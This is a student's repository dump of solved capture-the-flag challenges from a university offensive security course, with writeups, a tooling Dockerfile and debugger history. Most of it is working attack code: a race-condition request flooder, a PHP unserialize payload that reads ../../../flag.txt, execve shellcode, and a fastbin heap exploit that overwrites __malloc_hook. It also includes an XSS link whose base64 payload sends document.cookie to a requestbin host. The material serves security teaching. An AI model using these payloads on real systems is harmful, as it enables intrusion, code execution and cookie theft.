├── FINAL_CTF ├── race │ ├── exploit.py │ └── writeup.md ├── serialize │ ├── save.php │ ├── user.txt │ └── writeup.md ├── shellcode │ ├── exploit.py │ └── writeup.md ├── symbolic │ └── writeup.md └── xss │ └── writeup.md ├── README.md ├── docker └── Dockerfile ├── heap ├── fastbin-attack │ ├── .gdb_history │ ├── exploit.py │ ├── fastbin_attack │ ├── ld-2.23.so │ ├── libc-2.23.so │ ├── libc.so.6 │ └── x.py ├── pkm │ ├── .gdb_history │ ├── exploit.py │ ├── ld-2.27.so │ ├── libc-2.27_notcache.so │ ├── libc.so.6 │ ├── notes.txt │ ├── peda-session-pkm_nopie_notimer.txt │ ├── pkm_nopie │ ├── pkm_nopie_notimer │ ├── pkm_nopie_notimer_patched │ └── solve.py └── playground │ ├── .gdb_history │ ├── exploit.py │ ├── libc-2.27.so │ └── playground ├── mitigations ├── aslr │ ├── .gdb_history │ ├── exploit.py │ └── leakers ├── gonnaleak │ ├── .gdb_history │ ├── exploit.py │ └── leakers └── leakers │ ├── .gdb_history │ ├── exploit.py │ └── leakers ├── packer ├── .gdb_history └── john │ ├── .gdb_history │ ├── exploit.md │ ├── exploit.py │ ├── help.md │ ├── john │ ├── john_dump │ ├── johnpatch │ ├── out │ ├── out_patched │ ├── peda-session-john.txt │ ├── peda-session-johnpatch.txt │ └── } ├── race ├── aart │ └── exploit.py └── metarace │ └── exploit.py ├── reversing ├── crackme │ ├── .gdb_history │ ├── crackme │ └── exploit.py ├── keycheck_baby │ ├── exploit.py │ └── keycheck_baby ├── revmem │ ├── exploit.sh │ └── revmem └── revmemp │ ├── .gdb_history │ ├── revmem │ └── revmem_patched ├── rop ├── emptyspaces │ ├── .gdb_history │ ├── core │ ├── emptyspaces │ └── exploit.py ├── positiveleak │ ├── .gdb_history │ ├── exploit.py │ ├── libc-2.27.so │ └── positiveleak └── ropasaurusrex │ ├── .gdb_history │ ├── core │ ├── exploit.py │ ├── libc-2.27.so │ └── ropasaurusrex ├── serialization ├── free_as_in_beer │ └── exploit.py ├── lolshop │ ├── code.php │ └── exploit.py └── metactf │ ├── code.php │ ├── exploit.py │ └── upload ├── shellcode ├── backtoshell │ ├── backtoshell │ └── exploit.py ├── gimme3bytes │ ├── .gdb_history │ ├── exploit.py │ └── gimme3bytes ├── multistage │ ├── .gdb_history │ ├── exploit.py │ └── multistage ├── onlyreadwrite │ ├── .gdb_history │ ├── exploit.py │ ├── flag │ └── shellcode ├── server │ ├── .gdb_history │ ├── exploit.py │ ├── flag │ └── server ├── sh3llc0d3 │ ├── .gdb_history │ ├── exploit.py │ └── sh3llc0d3 ├── shellcode │ ├── .gdb_history │ ├── exploit.py │ └── shellcode ├── syscall │ ├── exploit.py │ └── syscall └── syscaslr │ ├── exploit.py │ └── syscaslr ├── symbolic ├── cracksymb │ ├── cracksymb │ └── exploit.py ├── prng │ ├── .gdb_history │ ├── MTwister │ │ ├── mtwister.c │ │ └── mtwister.h │ ├── clone_MT19937.py │ ├── pnrg │ ├── sim_runner.py │ ├── simulator │ └── simulator.c └── prodkey │ ├── exploit.py │ └── prodkey └── xss ├── babycsp_exploit.md ├── csp └── exploit.md └── strict-csp └── exploit.md /FINAL_CTF/race/exploit.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | from time import sleep 4 | from threading import Thread 5 | import string 6 | import random 7 | from bs4 import BeautifulSoup 8 | 9 | URL = "http://mktrace.ctf.offdef.it" 10 | # asdf 11 | # ffas 12 | s = requests.Session() 13 | 14 | def id_generator(size=8, chars=string.ascii_uppercase + string.digits): 15 | return ''.join(random.choice(chars) for _ in range(size)) 16 | 17 | 18 | def register(user, password): 19 | target = '{}/register'.format(URL) 20 | data = { 21 | "username": user, 22 | "password": password 23 | } 24 | r = requests.post(target, data=data) 25 | #print(r) 26 | 27 | 28 | def login(user, password): 29 | target = '{}/login'.format(URL) 30 | data = { 31 | "username": user, 32 | "password": password 33 | } 34 | r = s.post(target, data=data) 35 | #print(r) 36 | 37 | def new_market(n, p): 38 | target = '{}/new_market'.format(URL) 39 | data = { 40 | "name": n, 41 | "password": p 42 | } 43 | r = s.post(target, data=data) 44 | #print(r) 45 | 46 | def market_del(): 47 | target = '{}/market'.format(URL) 48 | r = s.get(target) 49 | #print(r) 50 | soup = BeautifulSoup(r.text, 'html.parser') 51 | ids = [tag.get_text(strip=True) for tag in soup.select('th')][7::] 52 | print(ids) 53 | return ids 54 | 55 | def del_order(id): 56 | target = '{}/delete_order/{}'.format(URL, id) 57 | r = s.get(target) 58 | #print(r.text) 59 | 60 | def new_order(): 61 | target = '{}/new_order'.format(URL) 62 | data = { 63 | "euro": "1", 64 | "coins": "100", 65 | "buy": "sell" 66 | } 67 | r = s.post(target, data=data) 68 | #print(r.text) 69 | 70 | def attacker(u,p): 71 | ids = market_del() 72 | for i in ids: 73 | del_order(i) 74 | new_order() 75 | 76 | print(ids) 77 | if len(ids) > 1: 78 | print("SUCCESS", user, password) 79 | sys.exit(0) 80 | 81 | s = requests.Session() 82 | user = id_generator() 83 | password = id_generator() 84 | 85 | mn = id_generator() 86 | mp = id_generator() 87 | 88 | register(user, password) 89 | login(user, password) 90 | new_market(mn, mp) 91 | ids = market_del() 92 | del_order(ids[0]) 93 | 94 | while True: 95 | t1 = Thread(target=attacker, args=(user, password)) 96 | t2 = Thread(target=attacker, args=(user, password)) 97 | t3 = Thread(target=attacker, args=(user, password)) 98 | t1.start() 99 | t2.start() 100 | t3.start() 101 | 102 | sleep(.05) 103 | -------------------------------------------------------------------------------- /FINAL_CTF/race/writeup.md: -------------------------------------------------------------------------------- 1 | # Race 2 | 3 | The proof of concept is that a user is created; then the user creates a market, and if the user can create two orders at the same time, this should create a race condition and duplicate the order. 4 | 5 | My exploit didn't work, but I think that it should, maybe adding more threads or with a faster connection. 6 | -------------------------------------------------------------------------------- /FINAL_CTF/serialize/save.php: -------------------------------------------------------------------------------- 1 | id = $fid; 12 | $this->name = $name; 13 | $this->items = array(); 14 | } 15 | 16 | public function addItem($fid){ 17 | array_push($this->items, $fid); 18 | } 19 | 20 | } 21 | 22 | // create a user 23 | $u = new User('1', 'Vechus'); 24 | 25 | // add dummy item, will open flag.txt 26 | $u->addItem('../../../flag.txt'); 27 | 28 | // serialize the user, in order to upload later 29 | $s = serialize($u); 30 | 31 | echo $s; 32 | 33 | 34 | // test index.php code 35 | /* 36 | foreach ($u->items as &$c) { 37 | printf("%s", new Item($c)); 38 | }*/ 39 | 40 | ?> -------------------------------------------------------------------------------- /FINAL_CTF/serialize/user.txt: -------------------------------------------------------------------------------- 1 | O:4:"User":4:{s:4:"name";s:6:"Vechus";s:3:"fid";N;s:5:"items";a:1:{i:0;s:17:"../../../flag.txt";}s:2:"id";s:1:"1";} -------------------------------------------------------------------------------- /FINAL_CTF/serialize/writeup.md: -------------------------------------------------------------------------------- 1 | # Serialize 2 | 3 | 1. register a user 4 | 2. login with the user 5 | 3. let's look at upload_user.php: 6 | line 27, unserialize($data), where data is uploaded by the user. Interesting. 7 | 4. let's look at data.php: 8 | line 31: $f = fopen("./items/".$fid, "r"); 9 | that means that if I create an Item and append it to the user, when unserializing it, it will print me the content of any item associated to the user 10 | 5. see attached script: save.php: 11 | after serializing and creating a file with the serialized user, uploading it will do the trick 12 | `php save.php` 13 | 6. upload the user 14 | 7. visit index.php: it should print the flag. 15 | -------------------------------------------------------------------------------- /FINAL_CTF/shellcode/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | # This exploit template was generated via: 4 | # $ pwn template --host bin.ctf.offdef.it --port 4001 5 | from pwn import * 6 | 7 | # Set up pwntools for the correct architecture 8 | context.update(arch='i386') 9 | exe = './path/to/binary' 10 | 11 | # Many built-in settings can be controlled on the command-line and show up 12 | # in "args". For example, to dump all data sent/received, and disable ASLR 13 | # for all created processes... 14 | # ./exploit.py DEBUG NOASLR 15 | # ./exploit.py GDB HOST=example.com PORT=4141 16 | host = args.HOST or 'bin.ctf.offdef.it' 17 | port = int(args.PORT or 4001) 18 | 19 | def start_local(argv=[], *a, **kw): 20 | '''Execute the target binary locally''' 21 | if args.GDB: 22 | return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw) 23 | else: 24 | return process([exe] + argv, *a, **kw) 25 | 26 | def start_remote(argv=[], *a, **kw): 27 | '''Connect to the process on the remote host''' 28 | io = connect(host, port) 29 | if args.GDB: 30 | gdb.attach(io, gdbscript=gdbscript) 31 | return io 32 | 33 | def start(argv=[], *a, **kw): 34 | '''Start the exploit against the target.''' 35 | if args.LOCAL: 36 | return start_local(argv, *a, **kw) 37 | else: 38 | return start_remote(argv, *a, **kw) 39 | 40 | # Specify your GDB script here for debugging 41 | # GDB will be launched if the exploit is run via e.g. 42 | # ./exploit.py GDB 43 | gdbscript = ''' 44 | continue 45 | '''.format(**locals()) 46 | 47 | #=========================================================== 48 | # EXPLOIT GOES HERE 49 | #=========================================================== 50 | 51 | io = start() 52 | 53 | sh = b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' 54 | 55 | io.send(sh) 56 | 57 | io.interactive() 58 | 59 | -------------------------------------------------------------------------------- /FINAL_CTF/shellcode/writeup.md: -------------------------------------------------------------------------------- 1 | # Shellcode 2 | 3 | Looking the program on ghidra: basically the program lets you input code that will be executed. 4 | 5 | see: exploit.py (generated with `pwn template` command). 6 | 7 | My exploit just sends the shellcode to the server. 8 | The shellcode is the same I used in every challenge and was originally taken from shellstorm. 9 | -------------------------------------------------------------------------------- /FINAL_CTF/symbolic/writeup.md: -------------------------------------------------------------------------------- 1 | # Symbolic 2 | 3 | This is a Latin Square problem, with the addition of rules on the diagonal. 4 | 5 | The solution can be computed by hand or using z3. 6 | 7 | My head was aching, so I personally solved by hand, like a sudoku. 8 | 9 | It took some time but eventually I came up with this solution: 10 | 11 | ``` 12 | 1 3 5 2 4 13 | 5 2 4 1 3 14 | 4 1 3 5 2 15 | 3 5 2 4 1 16 | 2 4 1 3 5 17 | ``` 18 | 19 | Note: This is just one of many solutions 20 | 21 | ## program 22 | 23 | The input is then taken row by row and each row has to be separated by '-': 13524-52413-41352-35241-24135 24 | 25 | Then the program yields the flag. 26 | -------------------------------------------------------------------------------- /FINAL_CTF/xss/writeup.md: -------------------------------------------------------------------------------- 1 | # XSS 2 | 3 | The csp is the following: 4 | ``` 5 | Content-Security-Policy: script-src 'self' https://cdn.jsdelivr.net 'unsafe-inline'; style-src 'unsafe-inline' 'self' https://cdn.jsdelivr.net 6 | ``` 7 | 8 | First of all, I wanted to check the "Copy Link" functionality, and then visiting the url copied, with the console open, we see that it unpacks the url param in: 9 | ```json 10 | {"players":[{"name":"Player1","level":1,"bufs":0,"rbufs":0,"note":" "},{"name":"Player2","level":1,"bufs":0,"rbufs":0,"note":" "}]} 11 | ``` 12 | 13 | So our note goes in the json. 14 | 15 | Now, let's find a working exploit. 16 | 17 | 'unsafe-inline' lets us execute any script dynamically, so the concept is to load an image, and `onload` redirect the page to my request bin. 18 | 19 | ``` 20 | 21 | ``` 22 | 23 | Now attach the payload to the json: 24 | 25 | ```json 26 | {"players":[{"name":"Player1","level":1,"bufs":0,"rbufs":0,"note":""}]} 27 | ``` 28 | 29 | And get the base64 of the payload. Then generate this link: 30 | 31 | ``` 32 | http://pointer.ctf.offdef.it/eyJwbGF5ZXJzIjpbeyJuYW1lIjoiUGxheWVyMSIsImxldmVsIjoxLCJidWZzIjowLCJyYnVmcyI6MCwibm90ZSI6IjwvdGV4dGFyZWE+PGltZyBzcmM9XCJodHRwczovL3VwbG9hZC53aWtpbWVkaWEub3JnL3dpa2lwZWRpYS9jb21tb25zL3RodW1iLzYvNjEvSFRNTDVfbG9nb19hbmRfd29yZG1hcmsuc3ZnLzEyMDBweC1IVE1MNV9sb2dvX2FuZF93b3JkbWFyay5zdmcucG5nXCIgb25sb2FkPVwid2luZG93LmxvY2F0aW9uLmhyZWY9J2h0dHBzOi8vcmVxdWVzdGJpbi50cmFpbmluZy5qaW5ibGFjay5pdC90OGRybnp0OD9jb29raWU9Jytkb2N1bWVudC5jb29raWVcIj4ifV19 33 | ``` 34 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ODC-challenges 2 | This is a collection of all solved challenges within the Offensive and Defensive Cybersecurity course at Politecnico di Milano. 3 | 4 | The repository is divided into folders that describe the challenge category. 5 | 6 | You can check out my solutions or solve the challenges indipendently. 7 | 8 | Enjoy! 9 | -------------------------------------------------------------------------------- /docker/Dockerfile: -------------------------------------------------------------------------------- 1 | # docker build -t ctf:ubuntu18.04 . 2 | # If using Windows 3 | # docker run --rm -v %cd%:/pwd --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -d --name ctf -i ctf:ubuntu18.04 4 | # If using Linux 5 | # docker run --rm -v $PWD:/pwd --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -d --name ctf -i ctf:ubuntu18.04 6 | # docker exec -it ctf /bin/bash 7 | 8 | FROM ubuntu:18.04 9 | ENV LC_CTYPE C.UTF-8 10 | ENV DEBIAN_FRONTEND=noninteractive 11 | RUN dpkg --add-architecture i386 && \ 12 | apt-get update && \ 13 | apt-get install -y build-essential jq strace ltrace curl wget rubygems gcc dnsutils netcat gcc-multilib net-tools vim gdb gdb-multiarch python python3 python3-pip python3-dev libssl-dev libffi-dev wget git make procps libpcre3-dev libdb-dev libxt-dev libxaw7-dev python-pip libc6:i386 libncurses5:i386 libstdc++6:i386 && \ 14 | pip install --upgrade pip && \ 15 | pip3 install --upgrade pip && \ 16 | pip install capstone requests pwntools r2pipe && \ 17 | pip3 install pwntools keystone-engine unicorn ropper && \ 18 | mkdir tools && cd tools && \ 19 | git clone https://github.com/JonathanSalwan/ROPgadget && \ 20 | git clone https://github.com/radare/radare2 && cd radare2 && sys/install.sh && \ 21 | cd .. && git clone https://github.com/pwndbg/pwndbg && cd pwndbg && ./setup.sh && \ 22 | gem install one_gadget -------------------------------------------------------------------------------- /heap/fastbin-attack/.gdb_history: -------------------------------------------------------------------------------- 1 | vmmap 2 | q 3 | vmmap 4 | q 5 | -------------------------------------------------------------------------------- /heap/fastbin-attack/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | # This exploit template was generated via: 4 | # $ pwn template --host training.jinblack.it --port 10101 fastbin_attack 5 | from pwn import * 6 | 7 | # Set up pwntools for the correct architecture 8 | exe = context.binary = ELF('fastbin_attack') 9 | 10 | # Many built-in settings can be controlled on the command-line and show up 11 | # in "args". For example, to dump all data sent/received, and disable ASLR 12 | # for all created processes... 13 | # ./exploit.py DEBUG NOASLR 14 | # ./exploit.py GDB HOST=example.com PORT=4141 15 | host = args.HOST or 'training.jinblack.it' 16 | port = int(args.PORT or 10101) 17 | 18 | def start_local(argv=[], *a, **kw): 19 | '''Execute the target binary locally''' 20 | if args.GDB: 21 | return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) 22 | else: 23 | return process(['./ld-2.23.so', '--library-path', '.', './fastbin_attack'] + argv) 24 | 25 | def start_remote(argv=[], *a, **kw): 26 | '''Connect to the process on the remote host''' 27 | io = connect(host, port) 28 | if args.GDB: 29 | gdb.attach(io, gdbscript=gdbscript) 30 | return io 31 | 32 | def start(argv=[], *a, **kw): 33 | '''Start the exploit against the target.''' 34 | if args.LOCAL: 35 | return start_local(argv, *a, **kw) 36 | else: 37 | return start_remote(argv, *a, **kw) 38 | 39 | # Specify your GDB script here for debugging 40 | # GDB will be launched if the exploit is run via e.g. 41 | # ./exploit.py GDB 42 | gdbscript = ''' 43 | tbreak main 44 | continue 45 | '''.format(**locals()) 46 | 47 | #=========================================================== 48 | # EXPLOIT GOES HERE 49 | #=========================================================== 50 | # Arch: amd64-64-little 51 | # RELRO: Full RELRO 52 | # Stack: Canary found 53 | # NX: NX enabled 54 | # PIE: PIE enabled 55 | 56 | libc = ELF('libc.so.6') 57 | 58 | SIZE = 0x60 59 | 60 | LEAK_OFFSET = 0x3c4b78 61 | MALLOC_HOOK_OFFSET = 0x3c4b10 62 | DELTA_HOOK = 0x23 63 | MAGIC = 0xf1247 64 | 65 | io = start() 66 | def alloc(size): 67 | io.recvuntil(b"> ") 68 | io.sendline(b"1") 69 | io.recvuntil(b"Size: ") 70 | io.sendline(b"%d" % size) 71 | indexline = io.recvuntil(b"!") 72 | #Allocated at index 0! 73 | m = re.match(b"Allocated at index (\d+)!", indexline) 74 | return int(m.group(1)) 75 | 76 | def write_chunk(index, content): 77 | io.recvuntil(b"> ") 78 | io.sendline(b"2") 79 | io.recvuntil(b"Index: ") 80 | io.sendline(b"%d" % index) 81 | io.recvuntil(b"Content: ") 82 | io.send(content) 83 | 84 | def read_chunk(index): 85 | io.recvuntil(b"> ") 86 | io.sendline(b"3") 87 | io.recvuntil(b"Index: ") 88 | io.sendline(b"%d" % index) 89 | data = io.recvuntil(b"Options:\n") 90 | return data[:-len(b"Options:\n")] 91 | 92 | def free_chunk(index): 93 | io.recvuntil(b"> ") 94 | io.sendline(b"4") 95 | io.recvuntil(b"Index: ") 96 | io.sendline(b"%d" % index) 97 | 98 | 99 | 100 | ''' 101 | now we perform fast bin atk 102 | we allocate a chunk with size of a fast bin 103 | second fast bn 104 | free of first 105 | free of the second 106 | free of first bin 107 | ''' 108 | 109 | chunk_1 = alloc(SIZE) 110 | chunk_2 = alloc(SIZE) 111 | 112 | 113 | free_chunk(chunk_1) 114 | free_chunk(chunk_2) 115 | free_chunk(chunk_1) 116 | 117 | # leak libc 118 | # alloc first two chunks 119 | chunk_a = alloc(SIZE) 120 | chunk_b = alloc(SIZE) 121 | 122 | 123 | free_chunk(chunk_a) 124 | libc_leak = u64(read_chunk(chunk_a)[:6]+b"\x00\x00") 125 | libc_base = libc_leak - LEAK_OFFSET 126 | libc.address = libc_base 127 | free_hook = libc.symbols["__free_hook"] 128 | malloc_hook = libc.symbols["__malloc_hook"] 129 | 130 | target = malloc_hook - 0x23 131 | 132 | print("[!] libc_leak: %#x" % libc_leak) 133 | print("[!] libc_base: %#x" % libc_base) 134 | print("[!] free_hook: %#x" % free_hook) 135 | print("[!] malloc_hook: %#x" % malloc_hook) 136 | print("[!] target: %#x" % target) 137 | 138 | # now, alloc another chunk and write the target to it 139 | chunk_A = alloc(SIZE) 140 | write_chunk(chunk_A, p64(target)) 141 | 142 | 143 | chunk_B = alloc(SIZE) 144 | chunk_C = alloc(SIZE) 145 | 146 | input("trigger") 147 | 148 | chunk_D = alloc(SIZE) 149 | 150 | 151 | 152 | io.interactive() 153 | -------------------------------------------------------------------------------- /heap/fastbin-attack/fastbin_attack: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/heap/fastbin-attack/fastbin_attack -------------------------------------------------------------------------------- /heap/fastbin-attack/ld-2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/heap/fastbin-attack/ld-2.23.so -------------------------------------------------------------------------------- /heap/fastbin-attack/libc-2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/heap/fastbin-attack/libc-2.23.so -------------------------------------------------------------------------------- /heap/fastbin-attack/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/heap/fastbin-attack/libc.so.6 -------------------------------------------------------------------------------- /heap/fastbin-attack/x.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | # This exploit template was generated via: 4 | # $ pwn template --host training.jinblack.it --port 10101 fastbin_attack 5 | from pwn import * 6 | 7 | # Set up pwntools for the correct architecture 8 | exe = context.binary = ELF('fastbin_attack') 9 | 10 | # Many built-in settings can be controlled on the command-line and show up 11 | # in "args". For example, to dump all data sent/received, and disable ASLR 12 | # for all created processes... 13 | # ./exploit.py DEBUG NOASLR 14 | # ./exploit.py GDB HOST=example.com PORT=4141 15 | host = args.HOST or 'training.jinblack.it' 16 | port = int(args.PORT or 10101) 17 | 18 | def start_local(argv=[], *a, **kw): 19 | '''Execute the target binary locally''' 20 | if args.GDB: 21 | return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) 22 | else: 23 | return process(['./ld-2.23.so', '--library-path', '.', './fastbin_attack'] + argv, *a, **kw) 24 | 25 | def start_remote(argv=[], *a, **kw): 26 | '''Connect to the process on the remote host''' 27 | io = connect(host, port) 28 | if args.GDB: 29 | gdb.attach(io, gdbscript=gdbscript) 30 | return io 31 | 32 | def start(argv=[], *a, **kw): 33 | '''Start the exploit against the target.''' 34 | if args.LOCAL: 35 | return start_local(argv, *a, **kw) 36 | else: 37 | return start_remote(argv, *a, **kw) 38 | 39 | # Specify your GDB script here for debugging 40 | # GDB will be launched if the exploit is run via e.g. 41 | # ./exploit.py GDB 42 | gdbscript = ''' 43 | tbreak main 44 | continue 45 | '''.format(**locals()) 46 | 47 | #=========================================================== 48 | # EXPLOIT GOES HERE 49 | #=========================================================== 50 | # Arch: amd64-64-little 51 | # RELRO: Full RELRO 52 | # Stack: Canary found 53 | # NX: NX enabled 54 | # PIE: PIE enabled 55 | 56 | io = start() 57 | 58 | LEAK_OFFSET = 0x3c4b78 59 | MALLOC_HOOK_OFFSET = 0x3c4b10 60 | DELTA_HOOK = 0x23 61 | MAGIC = 0xf1247 62 | SIZE = 0x60 63 | 64 | def alloc(c, size): 65 | c.recvuntil('> ') 66 | c.sendline('1') 67 | c.recvuntil('Size: ') 68 | c.sendline(str(size)) 69 | 70 | def write(c, index, data): 71 | c.recvuntil('> ') 72 | c.sendline('2') 73 | c.recvuntil('Index: ') 74 | c.sendline(str(index)) 75 | c.recvuntil('Content: ') 76 | c.send(data) 77 | 78 | def read(c, index): 79 | c.recvuntil('> ') 80 | c.sendline('3') 81 | c.recvuntil('Index: ') 82 | c.sendline(str(index)) 83 | return c.recvuntil('\nOptions:').split(b'\nOptions:')[0] 84 | 85 | def free(c, index): 86 | c.recvuntil('> ') 87 | c.sendline('4') 88 | c.recvuntil('Index: ') 89 | c.sendline(str(index)) 90 | 91 | 92 | # fastbin attack 93 | alloc(io, SIZE) # 0 94 | alloc(io, SIZE) # 1 95 | free(io, 0) 96 | free(io, 1) 97 | free(io, 0) 98 | 99 | 100 | # leak libc 101 | alloc(io, 0xA0) # 2 102 | alloc(io, 0x20) # 3 103 | free(io, 2) 104 | leak = read(io, 2) 105 | leak = u64(leak.ljust(8, b'\x00')) 106 | libc_base = leak - LEAK_OFFSET 107 | 108 | print('Libc base: ' + hex(libc_base)) 109 | 110 | # Write malloc hook 111 | alloc(io, SIZE) # 4 112 | alloc(io, SIZE) # 5 113 | write(io, 4, p64(libc_base + MALLOC_HOOK_OFFSET - DELTA_HOOK)) 114 | alloc(io, SIZE) # 6 115 | 116 | alloc(io, SIZE) # 7 117 | payload = b'A' * (DELTA_HOOK - 0x10) 118 | payload += p64(libc_base + MAGIC) 119 | write(io, 7, payload) 120 | 121 | alloc(io, SIZE) # call malloc hook and open bash 122 | 123 | io.interactive() 124 | 125 | -------------------------------------------------------------------------------- /heap/pkm/.gdb_history: -------------------------------------------------------------------------------- 1 | x/xg &__malloc_hook 2 | x/xg &__malloc_hook -0x23 3 | x/8xg &__malloc_hook -0x23 4 | x/8xg __malloc_hook -0x23 5 | x/8xg &__malloc_hook -0x23 6 | x/20xg &__malloc_hook -0x23 7 | x/100xg &__malloc_hook -0x23 8 | x/100xg &__malloc_hook 9 | x/100xg &__malloc_hook -0x20 10 | x/100xg &__malloc_hook -0x30 11 | x/100xg &__malloc_hook -0x23 12 | x/100xg &__malloc_hook -0x3 13 | x/100xg &__malloc_hook -0x1 14 | x/100xg &__malloc_hook -0x10 15 | x/8xg 0x7ffff7dcdbf0 16 | x/xg 0x7ffff7dcdbf0 17 | x/xg 0x7ffff7dcdbf0 - 0x3 18 | x/xg 0x7ffff7dcdbf0 + 0x3 19 | x/xg 0x7ffff7dcdbf0 + 0x6 20 | x/xg 0x7ffff7dcdbf0 + 0x5 21 | x/xg 0x7ffff7dcdbf0 + 0x5 -0x23 22 | i proc mappings 23 | p 0x7ffff7dcdbd2 - 0x7ffff79eb000 24 | q 25 | c 26 | q 27 | c 28 | x/100gx 0x00405600 29 | p main_arena 30 | c 31 | x/100gx 0x00405600 32 | p main_arena 33 | info reg 34 | q 35 | c 36 | p main_arena 37 | x/100gx 0x00405600 38 | x/100gx 0x00405600 + 0x100 39 | x/100gx 0x00405600 + 0x200 40 | x/100gx 0x00405600 + 0x300 41 | x/100gx 0x00405600 + 0x400 42 | x/100gx 0x00405600 43 | q 44 | c 45 | x/100gx 0x00405600 46 | q 47 | c 48 | x/100gx 0x00405600 49 | c 50 | q 51 | c 52 | x/100gx 0x00405600 53 | c 54 | c 55 | x/100gx 0x00405600 56 | c 57 | x/100gx 0x00405600 58 | c 59 | x/100gx 0x00405600 60 | c 61 | x/100gx 0x00405600 62 | c 63 | x/100gx 0x00405600 64 | c 65 | x/100gx 0x00405600 66 | c 67 | x/100gx 0x00405600 68 | c 69 | c 70 | x/100gx 0x00405600 71 | c 72 | x/100gx 0x00405600 73 | p main_arena 74 | q 75 | c 76 | p main_arena 77 | q 78 | c 79 | q 80 | c 81 | x/100gx 0x00405600 82 | c 83 | x/100gx 0x00405600 84 | p 0x405600 85 | x 0x405600 86 | x 0x405600 + 0x10 87 | x 0x405600 + 0x5 88 | x 0x405600 + 0x1 89 | x 0x405600 + 0x2 90 | x 0x405600 + 0x8 91 | q 92 | c 93 | x/100gx 0x00405600 94 | c 95 | x/100gx 0x00405600 96 | p main_arena 97 | q 98 | c 99 | x/100gx 0x00405600 100 | q 101 | c 102 | x/100gx 0x00405600 103 | c 104 | x/100gx 0x00405600 105 | c 106 | c 107 | x/100gx 0x00405600 108 | c 109 | x/100gx 0x00405600 110 | p main_arena 111 | x/100gx 0x00405600 112 | q 113 | c 114 | x/100gx 0x00405600 115 | c 116 | q 117 | c 118 | x/100gx 0x00405600 119 | c 120 | x/100gx 0x00405600 121 | q 122 | c 123 | x/100gx 0x00405600 124 | q 125 | c 126 | x/100gx 0x00405600 127 | q 128 | c 129 | x/100gx 0x00405600 130 | c 131 | q 132 | c 133 | x/100gx 0x00405600 134 | c 135 | x/100gx 0x00405600 136 | q 137 | c 138 | x/100gx 0x00405600 139 | c 140 | x/100gx 0x00405600 141 | p main_arena 142 | q 143 | c 144 | p main_arena 145 | x/100gx 0x00405600 146 | c 147 | x/100gx 0x00405600 148 | c 149 | x/100gx 0x00405600 150 | p main_arena 151 | c 152 | p main_arena 153 | q 154 | c 155 | x/100gx 0x00405600 156 | c 157 | x/100gx 0x00405600 158 | p main_arena 159 | x/10x 0x7ffff7dcdbd2 160 | x/10x 0x7ffff7dcdbd2 161 | c 162 | q 163 | c 164 | x/100gx 0x00405600 165 | c 166 | x/100gx 0x00405600 167 | c 168 | x/100gx 0x00405600 169 | p main_arena 170 | q 171 | c 172 | p main_arena 173 | info addr __malloc_hook 174 | p/x 0x7ffff7dcdc10 - 0x7ffff7dcdbc2 175 | p/x 0x7ffff7dcdc10 - 0x7ffff7dcdbc2 + 0x10 176 | p/x 0x7ffff7dcdc10 - 0x7ffff7dcdbc2 - 0x10 177 | p/x 0x4d + 0x13 178 | p/x 0x70 - 0x10 - 0x3e 179 | q 180 | c 181 | x/100gx 0x00405600 182 | x/100gx 0x00405700 183 | x/100gx 0x00405800 184 | c 185 | x/100gx 0x00405800 186 | info addr __malloc_hook 187 | c 188 | q 189 | c 190 | q 191 | c 192 | p main_arena 193 | ni 194 | si 195 | ni 196 | si 197 | ni 198 | si 199 | ni 200 | ni 201 | q 202 | c 203 | p main_arena 204 | x/100gx 0x00405800 205 | p main_arena 206 | ni 207 | si 208 | ni 209 | si 210 | ni 211 | si 212 | ni 213 | si 214 | ni 215 | x/100gx 0x00405800 216 | p main_arena 217 | ni 218 | x/gx 0x7ffff7dcdbc2 219 | x/gx 0x7ffff7dcdbc2 + 0x10 220 | x/gx 0x7ffff7dcdbc2 - 0x10 221 | x/100gx 0x7ffff7dcdbc2 - 0x10 222 | x/50gx &__malloc_hook 223 | x/50gx &__malloc_hook + 0x10 224 | x/50gx &__malloc_hook + 0x01 225 | x/50gx &__malloc_hook + 0x02 226 | x/50gx &__malloc_hook + 0x04 227 | x/50gx &__malloc_hook + 0x05 228 | x/50gx &__malloc_hook + 0x06 229 | x/50gx &__malloc_hook + 0x07 230 | x/50gx &__malloc_hook + 0x08 231 | x/50gx &__malloc_hook + 0x10 232 | x/50gx &__malloc_hook - 0x10 233 | x/50gx &__malloc_hook - 0x23 234 | q 235 | c 236 | vmmap 237 | x/10gx 0x00007ffff79eb000 + 4074477 238 | p/x 4074477 239 | q 240 | c 241 | x/xg &__malloc_hook 242 | vmmap 243 | p/x 0x00007ffff79eb000+0x3e2bed 244 | i addr __malloc_hook 245 | p/x 0x7ffff7dcdbed - 0x7ffff7dcdc10 246 | p/x 0x7ffff7dcdc10-0x7ffff7dcdbed 247 | q 248 | c 249 | x/xg &__malloc_hook 250 | c 251 | q 252 | c 253 | p/x $rsp+0x40 254 | x/x $rsp+0x40 255 | x/x $rsp+0x40 256 | q 257 | -------------------------------------------------------------------------------- /heap/pkm/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 